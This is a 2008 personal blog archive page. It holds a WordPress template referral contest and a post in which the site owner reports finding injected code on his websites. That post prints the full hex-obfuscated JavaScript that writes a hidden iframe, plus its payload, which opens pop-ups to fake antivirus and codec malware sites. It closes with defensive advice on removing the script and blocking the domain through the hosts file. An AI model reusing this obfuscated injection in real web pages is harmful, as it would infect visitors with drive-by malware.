Monthly Archives: July 2008

Silenced general Silenced news

Win a wordpress template (MQ Faded)

July 26, 2008 – 12:58 pm

By entering this contest you will get the chance to win one of my wordpress templates: MQ Faded.
The winner gets to do whatever he/she wants with it. So you can either keep it to yourself and have a unique blog design, or release to the public. Either way I ask that you keep my link in the footer.

Contest start date: 07.26.2008

How to enter:
You will need to register to Web2logs via this link to enter and refer as many people as you can to win. The URL you need to promote will be http://www.web2logs.com/register/user (replace user with your username) .

Rules: No creating fake accounts, each user signed up under you must be unique. You must refer at least 50 people to be eligible.

Contest ends: When somebody refers 200 users.

Prize: WordPress template MQ Faded
Live stats at http://www.web2logs.com/stats.php

Good luck to you all.

Comment (0)
Silenced general

Hacked!?

July 13, 2008 – 3:50 pm

Recently I noticed something else than google analytics loading in the status bar when I visited some of my sites, so I thought I`ll have a closer look.

Three of my sites had hidden links added in the footer and two of them had a piece of JavaScript.

Of course, I removed the links without thinking, but I did save thescript.

Here is how the script looks:

<!-- ~ -->
<script type="text/javascript">
function oxsletpvxjt(qixfiot){
var ddrbvc="";
for(mpcrghwo=0;mpcrghwo<qixfiot.length;mpcrghwo+=2){
ddrbvc+=(String.fromCharCode(parseInt(qixfiot.substr(mpcrghwo,2),16)));
}document.write(ddrbvc);
}
oxsletpvxjt("3Cpsbmbvr6966psbmbvr72psbmbvr616D65psbmbvr20psbmbvr73psbmbvr7263psbmbvr3D22psbmbvr687474703A2F2Fpsbmbvr74756D75psbmbvr6Cpsbmbvr74psbmbvr75psbmbvr6F73psbmbvr75psbmbvr6Dpsbmbvr2Epsbmbvr63psbmbvr6F6D2F65702Fpsbmbvr696E64psbmbvr6578psbmbvr2Epsbmbvr7068psbmbvr7022psbmbvr207374796C65psbmbvr3Dpsbmbvr227669psbmbvr73psbmbvr69psbmbvr62psbmbvr696Cpsbmbvr69psbmbvr74psbmbvr79psbmbvr3A2068psbmbvr696464psbmbvr65psbmbvr6E3Bpsbmbvr206469psbmbvr73psbmbvr706C61psbmbvr79psbmbvr3A20psbmbvr6E6F6E65223E3Cpsbmbvr2Fpsbmbvr69psbmbvr66psbmbvr72psbmbvr61psbmbvr6D65psbmbvr3E".replace(/psbmbvr/g, ""));
</script><
<!-- ~ -->

Here is what the script does:

<iframe src="http://tumultuosum.com/ep/index.php" style="visibility: hidden; display: none"></iframe>

Here is the iframe content:

<iframe src="http://razmarin.net/a32/index.php"></iframe>
<iframe src="http://www.antivirxp08.com/sysscan/5060f17b673b0b9bba790dd61bb6de34/1/66"></iframe>

<script language=JavaScript>
window.open("http://www.antivirxp08.com/sysscan/5060f17b673b0b9bba790dd61bb6de34/1/67", "_blank");
window.open("http://www.youpornztube.com/codec/5060f17b673b0b9bba790dd61bb6de34/14/68", "_blank");
</script>

Probably a trojan of some knind, didn`t feel like looking any further.

Interesting thing is how that code got on my websites. I`m sure my account was not hacked, if it was so, all my sites would have been messed with, so I`m guessing it was the server that got hacked. What people would do for a few extra links and traffic.

So make sure you look in the source of your websites and if you find that piece of JavaScript at the end, just remove it.

As for the surfers, I guess you should block that site so you won`t get infected with who knows what.

Easyest way to do that is to edit your hosts file.

Where to find hosts file:

Windows Vista  	=  	C:\WINDOWS\SYSTEM32\DRIVERS\ETC
Windows XP 	= 	C:\WINDOWS\SYSTEM32\DRIVERS\ETC
Windows 2K 	= 	C:\WINNT\SYSTEM32\DRIVERS\ETC
Win 98/ME 	= 	C:\WINDOWS

How hosts file contents look like:

127.0.0.1       localhost

Edit and add the unvanted site:

127.0.0.1       tumultuosum.com

How it should look now:

127.0.0.1       localhost
127.0.0.1       tumultuosum.com

So if anyone knows John Phillips, the person that seems to own the domain “tumultuosum”, tell him that either he got hacked or he`s just a big fat jerk and a lousy hacker.

Comments (5)